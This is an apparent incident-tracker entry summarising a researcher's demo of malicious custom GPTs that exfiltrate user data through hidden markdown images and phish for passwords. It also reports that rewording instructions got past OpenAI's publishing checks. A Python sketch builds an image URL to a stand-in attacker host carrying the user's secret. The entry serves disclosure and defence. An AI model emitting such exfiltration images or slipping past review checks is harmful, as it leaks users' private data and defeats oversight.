Malicious ChatGPT Agents: How GPTs Can Quietly Grab Your Data (Demo)
Summary
A researcher demonstrated that malicious GPTs (custom ChatGPT agents) can covertly exfiltrate user data by embedding hidden images in conversations: when the chat client renders the image, the request to the attacker-controlled server carries the user's information in the URL. Such GPTs can also socially engineer users into revealing personal details like passwords. OpenAI's validation checks for publishing GPTs can be bypassed by slightly rewording the malicious instructions, so harmful GPTs can be shared publicly. The researcher reported these issues to OpenAI in November 2023 but received no fix.
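The image-based exfiltration described above can be sketched as follows. This is a minimal illustration, not the researcher's actual payload: the host name `attacker.example` and the function name are hypothetical. The point is that a GPT's hidden instructions only need to make it emit a markdown image whose URL embeds conversation data; rendering the image then issues an HTTP request that delivers that data to whoever runs the server.

```python
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint (illustrative name only).
EXFIL_HOST = "https://attacker.example/pixel.png"

def exfil_image_markdown(secret: str) -> str:
    """Build the markdown image tag a malicious GPT could emit.

    When the chat client renders this image, the browser fetches the URL,
    and the query string (containing the user's data) lands in the
    attacker's server logs. The empty alt text keeps the image unobtrusive.
    """
    return f"![ ]({EXFIL_HOST}?q={quote(secret)})"

print(exfil_image_markdown("user password: hunter2"))
# The secret travels URL-encoded in the query string of an innocuous-looking image.
```

Defenses on the client side include refusing to render images from non-allowlisted domains, which is the mitigation generally discussed for this class of markdown-injection exfiltration.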
Classification
Affected Vendors
Related Issues
Original source: https://embracethered.com/blog/posts/2023/openai-custom-malware-gpt/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 92%